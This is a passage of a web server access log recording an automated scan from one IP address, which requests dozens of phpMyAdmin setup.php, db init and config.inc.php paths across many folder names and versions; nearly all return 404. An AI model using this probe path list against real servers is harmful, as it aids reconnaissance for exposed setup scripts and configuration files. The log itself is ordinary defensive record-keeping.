bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 21/1492] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:36:42 2022] GET /pHpMyAdMiN/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 22/1493] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:36:43 2022] GET /phpMyAdmin/scripts/setup.php => generated 179 bytes in 1 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 47/1494] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:36:44 2022] GET /phpadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 48/1495] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:36:45 2022] GET /phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1282/1496] 89.248.165.201 () {36 vars in 481 bytes} [Tue Feb 15 21:36:46 2022] GET /sqladm/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1283/1497] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:36:47 2022] GET /sqladmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1284/1498] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:36:47 2022] GET /phpmyadmin/scripts/db.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1285/1499] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:36:49 2022] GET /phpMyAdmin/scripts/db.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1286/1500] 89.248.165.201 () {36 vars in 483 bytes} [Tue Feb 15 21:36:50 2022] GET /MyAdmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1287/1501] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:36:50 2022] GET /database/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1288/1502] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 
15 21:36:51 2022] GET /phpAdmin/scripts/setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1289/1503] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:36:52 2022] GET /phpmyadmin1/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1290/1504] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:36:53 2022] GET /phpmyadmin2/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1291/1505] 89.248.165.201 () {36 vars in 475 bytes} [Tue Feb 15 21:36:54 2022] GET /pma/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1292/1506] 89.248.165.201 () {36 vars in 497 bytes} [Tue Feb 15 21:36:56 2022] GET /php/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1293/1507] 89.248.165.201 () {36 vars in 501 bytes} [Tue Feb 15 21:36:57 2022] GET /forum/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1294/1508] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:36:57 2022] GET /_phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1295/1509] 89.248.165.201 () {36 vars in 481 bytes} [Tue Feb 15 21:36:58 2022] GET /websql/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1296/1510] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:36:59 2022] GET /php-my-admin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19148|app: 0|req: 1297/1511] 89.248.165.201 () {36 vars in 475 bytes} [Tue Feb 15 21:37:00 2022] GET /web/scripts/setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1298/1512] 89.248.165.201 () {36 vars in 501 bytes} [Tue Feb 15 21:37:01 2022] GET /xampp/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1299/1513] 89.248.165.201 () {36 vars in 497 bytes} [Tue Feb 15 21:37:02 2022] GET /web/phpMyAdmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1300/1514] 89.248.165.201 () {36 vars in 497 bytes} [Tue Feb 15 21:37:03 2022] GET /web/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1301/1515] 89.248.165.201 () {36 vars in 501 bytes} [Tue Feb 15 21:37:04 2022] GET /typo3/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1302/1516] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:37:05 2022] GET /cpphpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1303/1517] 89.248.165.201 () {36 vars in 501 bytes} [Tue Feb 15 21:37:05 2022] GET /cpanelphpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1304/1518] 89.248.165.201 () {36 vars in 499 bytes} [Tue Feb 15 21:37:07 2022] GET /blog/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1305/1519] 89.248.165.201 () {36 vars in 519 bytes} [Tue Feb 15 
21:37:08 2022] GET /apache-default/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1306/1520] 89.248.165.201 () {36 vars in 571 bytes} [Tue Feb 15 21:37:09 2022] GET /administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1307/1521] 89.248.165.201 () {36 vars in 501 bytes} [Tue Feb 15 21:37:10 2022] GET /admin/phpmyadmin/scripts/setup.php => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 359 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1308/1522] 89.248.165.201 () {36 vars in 538 bytes} [Tue Feb 15 21:37:10 2022] GET /admin/login/?next=/admin/phpmyadmin/scripts/setup.php => generated 2270 bytes in 7 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 11/1523] 89.248.165.201 () {36 vars in 487 bytes} [Tue Feb 15 21:37:12 2022] GET /admin/pma/scripts/setup.php => generated 0 bytes in 12 msecs (HTTP/1.1 302) 9 headers in 352 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1309/1524] 89.248.165.201 () {36 vars in 524 bytes} [Tue Feb 15 21:37:12 2022] GET /admin/login/?next=/admin/pma/scripts/setup.php => generated 2256 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 12/1525] 89.248.165.201 () {36 vars in 479 bytes} [Tue Feb 15 21:37:13 2022] GET /admin/scripts/setup.php => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 348 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 13/1526] 89.248.165.201 () {36 vars in 516 bytes} [Tue Feb 15 21:37:14 2022] GET /admin/login/?next=/admin/scripts/setup.php => generated 2248 bytes in 25 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1310/1527] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:14 2022] GET 
/phpmyadmin7/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1311/1528] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:15 2022] GET /phpmyadmin6/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1312/1529] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:16 2022] GET /phpmyadmin5/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1313/1530] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:17 2022] GET /phpmyadmin4/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1314/1531] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:18 2022] GET /phpmyadmin3/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1315/1532] 89.248.165.201 () {36 vars in 467 bytes} [Tue Feb 15 21:37:19 2022] GET /scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1316/1533] 89.248.165.201 () {36 vars in 451 bytes} [Tue Feb 15 21:37:20 2022] GET /setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1317/1534] 89.248.165.201 () {36 vars in 499 bytes} [Tue Feb 15 21:37:20 2022] GET /phpmyadmin/scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1318/1535] 89.248.165.201 () {36 vars in 499 bytes} [Tue Feb 15 21:37:22 2022] GET /phpMyAdmin/scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 
19/1536] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:37:23 2022] GET /myadmin/scripts/db___.init.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 20/1537] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:37:24 2022] GET /PMA/scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1319/1538] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:37:24 2022] GET /pma/scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1320/1539] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:37:25 2022] GET /MyAdmin/scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1321/1540] 89.248.165.201 () {36 vars in 477 bytes} [Tue Feb 15 21:37:26 2022] GET /scripts/db___.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1322/1541] 89.248.165.201 () {36 vars in 481 bytes} [Tue Feb 15 21:37:27 2022] GET /sqlweb/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1323/1542] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:37:28 2022] GET /phpLDAPadmin/scripts/setup => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1324/1543] 89.248.165.201 () {36 vars in 479 bytes} [Tue Feb 15 21:37:29 2022] GET /p/m/a/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1325/1544] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:30 2022] GET /phpmy-admin/scripts/setup.php => generated 179 bytes in 2 msecs 
(HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1326/1545] 89.248.165.201 () {36 vars in 499 bytes} [Tue Feb 15 21:37:31 2022] GET /phpMyAdmin/css/phpmyadmin.css.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1327/1546] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:37:32 2022] GET /phpmyadmin/config.user.inc.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1328/1547] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:37:33 2022] GET /phpMyAdmin/libraries/database_interface.lib.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1329/1548] 89.248.165.201 () {36 vars in 475 bytes} [Tue Feb 15 21:37:35 2022] GET /config/config.inc.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1330/1549] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:37:36 2022] GET /2phpmyadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1331/1550] 89.248.165.201 () {36 vars in 499 bytes} [Tue Feb 15 21:37:37 2022] GET /phpMyAdmin/scripts/config.inc.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1332/1551] 89.248.165.201 () {36 vars in 537 bytes} [Tue Feb 15 21:37:38 2022] GET /phpMyAdmin-2.11.11.3-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1333/1552] 89.248.165.201 () {36 vars in 471 bytes} [Tue Feb 15 21:37:39 2022] GET /scripts/db.init.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 
1334/1553] 89.248.165.201 () {36 vars in 521 bytes} [Tue Feb 15 21:37:41 2022] GET /phpMyAdmin-3.1.3.0-english/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1335/1554] 89.248.165.201 () {36 vars in 533 bytes} [Tue Feb 15 21:37:41 2022] GET /phpMyAdmin-3.1.3.0-all-languages/scripts/setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1336/1555] 89.248.165.201 () {36 vars in 521 bytes} [Tue Feb 15 21:37:42 2022] GET /phpMyAdmin-3.1.2.0-english/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1337/1556] 89.248.165.201 () {36 vars in 533 bytes} [Tue Feb 15 21:37:43 2022] GET /phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1338/1557] 89.248.165.201 () {36 vars in 521 bytes} [Tue Feb 15 21:37:44 2022] GET /phpMyAdmin-3.1.1.0-english/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1339/1558] 89.248.165.201 () {36 vars in 525 bytes} [Tue Feb 15 21:37:45 2022] GET /phpMyAdmin-3.0.0-rc1-english/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1340/1559] 89.248.165.201 () {36 vars in 533 bytes} [Tue Feb 15 21:37:47 2022] GET /phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1341/1560] 89.248.165.201 () {36 vars in 525 bytes} [Tue Feb 15 21:37:48 2022] GET /phpMyAdmin-3.1.0.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
19148|app: 0|req: 1342/1561] 89.248.165.201 () {36 vars in 537 bytes} [Tue Feb 15 21:37:50 2022] GET /phpMyAdmin-3.1.0.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1343/1562] 89.248.165.201 () {36 vars in 525 bytes} [Tue Feb 15 21:37:51 2022] GET /phpMyAdmin-3.0.1.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1344/1563] 89.248.165.201 () {36 vars in 537 bytes} [Tue Feb 15 21:37:52 2022] GET /phpMyAdmin-3.0.1.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1345/1564] 89.248.165.201 () {36 vars in 525 bytes} [Tue Feb 15 21:37:53 2022] GET /phpMyAdmin-3.0.0.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1346/1565] 89.248.165.201 () {36 vars in 537 bytes} [Tue Feb 15 21:37:54 2022] GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1347/1566] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:37:55 2022] GET /phpMyAdmin-2.11.9.5-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1348/1567] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:37:56 2022] GET /phpMyAdmin-2.11.9.5-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1349/1568] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:37:57 2022] GET /phpMyAdmin-2.11.9.4-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers 
in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1350/1569] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:37:57 2022] GET /phpMyAdmin-2.11.9.4-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 98/1570] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:37:59 2022] GET /phpMyAdmin-2.11.9.3-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1351/1571] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:00 2022] GET /phpMyAdmin-2.11.9.3-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 49/1572] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:02 2022] GET /phpMyAdmin-2.11.9.2-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1352/1573] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:03 2022] GET /phpMyAdmin-2.11.9.2-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1353/1574] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:04 2022] GET /phpMyAdmin-2.11.9.1-english/scripts/setup.php%20 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1354/1575] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:05 2022] GET /phpMyAdmin-2.11.9.1-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1355/1576] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:06 2022] GET /phpMyAdmin-2.11.9.0-english/scripts/setup.php%20 => generated 
179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1356/1577] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:07 2022] GET /phpMyAdmin-2.11.9.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1357/1578] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:08 2022] GET /phpMyAdmin-2.11.8.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1358/1579] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:09 2022] GET /phpMyAdmin-2.11.8.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1359/1580] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:10 2022] GET /phpMyAdmin-2.11.7.1-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1360/1581] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:11 2022] GET /phpMyAdmin-2.11.7.1-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1361/1582] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:12 2022] GET /phpMyAdmin-2.11.7.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1362/1583] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:13 2022] GET /phpMyAdmin-2.11.7.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1363/1584] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:14 2022] GET 
/phpMyAdmin-2.11.6.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1364/1585] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:15 2022] GET /phpMyAdmin-2.11.6.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1365/1586] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:16 2022] GET /phpMyAdmin-2.11.5.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1366/1587] 89.248.165.201 () {36 vars in 539 bytes} [Tue Feb 15 21:38:17 2022] GET /phpMyAdmin-2.11.5.0-all-languages/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1367/1588] 89.248.165.201 () {36 vars in 527 bytes} [Tue Feb 15 21:38:17 2022] GET /phpMyAdmin-2.11.4.0-english/scripts/setup.php%20 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1368/1589] 89.248.165.201 () {36 vars in 535 bytes} [Tue Feb 15 21:38:18 2022] GET /phpMyAdmin-2.11.4.0-all-languages/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1369/1590] 89.248.165.201 () {36 vars in 491 bytes} [Tue Feb 15 21:38:19 2022] GET /mysql-admin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1370/1591] 89.248.165.201 () {36 vars in 493 bytes} [Tue Feb 15 21:38:21 2022] GET /mysqlmanager/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1371/1592] 89.248.165.201 () {36 vars in 475 bytes} [Tue Feb 15 21:38:21 2022] 
GET /sql/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1372/1593] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:38:23 2022] GET /sqlmanager/scripts/setup.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1373/1594] 89.248.165.201 () {36 vars in 479 bytes} [Tue Feb 15 21:38:24 2022] GET /webdb/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1374/1595] 89.248.165.201 () {36 vars in 485 bytes} [Tue Feb 15 21:38:25 2022] GET /webadmin/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1375/1596] 89.248.165.201 () {36 vars in 489 bytes} [Tue Feb 15 21:38:26 2022] GET /phpmanager/scripts/setup.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1376/1597] 209.17.97.114 () {30 vars in 410 bytes} [Tue Feb 15 22:02:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1377/1598] 193.118.53.202 () {34 vars in 488 bytes} [Tue Feb 15 22:28:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1378/1599] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 15 23:28:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers 